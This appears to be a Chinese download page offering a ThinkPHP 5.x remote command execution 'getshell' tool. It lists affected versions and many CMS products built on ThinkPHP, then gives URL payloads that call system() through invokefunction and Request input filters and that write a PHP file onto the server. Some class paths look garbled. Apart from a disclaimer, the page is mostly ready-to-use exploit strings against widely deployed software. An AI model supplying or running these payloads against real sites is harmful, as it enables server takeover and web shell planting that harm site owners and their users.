ThinkPHP5.x远程命令执行(getshell)测试工具

ThinkPHP5.x远程命令执行(getshell)测试工具-使者云
ThinkPHP5.x远程命令执行(getshell)测试工具
此内容为付费资源,请付费后查看
会员专属资源
您暂无购买权限,请先开通会员
开通会员
付费资源
------正文内容展示,开始汲取新知识啦------

免责声明

请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。工具来自网络,安全性自测,如有侵权请联系删除。

图片[1]-ThinkPHP5.x远程命令执行(getshell)测试工具-使者云

影响范围

  • 5.x < 5.1.31
  • 5.x <= 5.0.23

以下基于ThinkPHP5 二次开发的内容管理系统,很可能受到该漏洞影响,建议厂商及时更新。AdminLTE后台管理系统

  • layui后台管理系统
  • thinkcmf
  • H-ui.admin后台管理系统
  • tpshop
  • FsatAdmin
  • eyoucms
  • LarryCMS后台管理系统
  • tpadmin后台管理系统
  • snake后台管理系统
  • ThinkSNS
  • DolphinPHP后台管理系统
  • WeMall商城系统
  • CLTPHP
  • 齐博CMS
  • DSMALL
  • YFCMF
  • HisiPHP后台管理系统
  • Tplay后台管理系统
  • lyadmin后台管理系统
  • haoid后台管理系统

漏洞验证

命令执行getshell

测试代码

#代码执行?s=index/thinkRequest/input&filter=phpinfo&data=1#命令执行?s=index/thinkRequest/input&filter=system&data=系统命令
#getshell?s=index/thinktemplatedriverfile/write&cacheFile=paylog.php&content=hacker#getshell2?
s=index/thinkviewdriverPhp/display&content=#代码执行?
s=index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1#命令执行?
s=index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=系统命令#代码执行?
s=index/thinkContainer/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1#命令执行?
s=index/thinkContainer/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=系统命令
------本页内容已结束,喜欢请分享------

感谢您的来访,获取更多精彩文章请收藏本站。

© 版权声明
THE END
喜欢就支持一下吧
点赞2864赞赏 分享
抢沙发

请登录后发表评论

    暂无评论内容